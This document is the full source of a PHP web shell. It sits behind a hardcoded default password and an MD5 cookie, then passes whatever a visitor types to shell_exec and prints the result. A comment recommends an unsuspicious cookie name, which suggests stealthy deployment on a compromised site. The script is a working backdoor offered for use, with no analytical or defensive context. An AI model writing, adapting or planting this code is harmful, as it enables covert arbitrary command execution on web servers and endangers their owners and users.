Shell execution script

<?php
// what is the password?
$pass = 'pass';
// cookie name - consider changing this to something that people won't suspect
$cookie_name = 'wjcookie';
// md5() the password
$md5_pass = md5($pass);

// checks to see if the cookie is set
if (!isset($_COOKIE[$cookie_name]))
{
	//if the cookie isn't set and the form hasn't been submitted: echo the form
	if (!isset($_POST['conf']))
	{
		echo "Password: <form action='{$_SERVER['PHP_SELF']}' method='post'>
				<input type='password' name='password'><br />
				<input type='hidden' name='conf'>
				<input type='submit'>
				</form>";
		die();
	}
	//if the cookie isn't set and the form has been submitted: check to see if the passwords match
	else 
	{
		if ($_POST['password'] == $pass)
		{
			setcookie($cookie_name, $md5_pass, time()+3600, '/');
		}
		else 
		{
			die('Wrong password.');
		}
	}
}
// if the cookie is set but the passwords don't match, then die
if (isset($_COOKIE[$cookie_name]))
{
	if ($_COOKIE[$cookie_name] != $md5_pass)
	{
		die("Invalid cookie information.");
	}
}
// if the passwords in the cookie match echo the form for the shell command
echo "<h2>Shell Execution Script</h2>
		<form method='post' action='{$_SERVER['PHP_SELF']}'>
		<input type='text' name='input' size='90'><br />
		<input type='submit'>
		</form>
		<br />";
// die if the form hasn't been submitted
if (!isset($_POST['input']))
{
	die();
}
// get the output from the command that was executed
$output = shell_exec($_POST['input']);
// this checks to see if the file is PHP then highlights it.
if (preg_match("/<?php/i", $output) || preg_match('/\.php/i', $_POST['input']))
{
	highlight_string($output);
	die();
}
// if not PHP then it echos it out to the screen
echo nl2br(htmlspecialchars($output));
// command wasn't successfull
if ($output == NULL)
{
	echo "No output.";
}
?>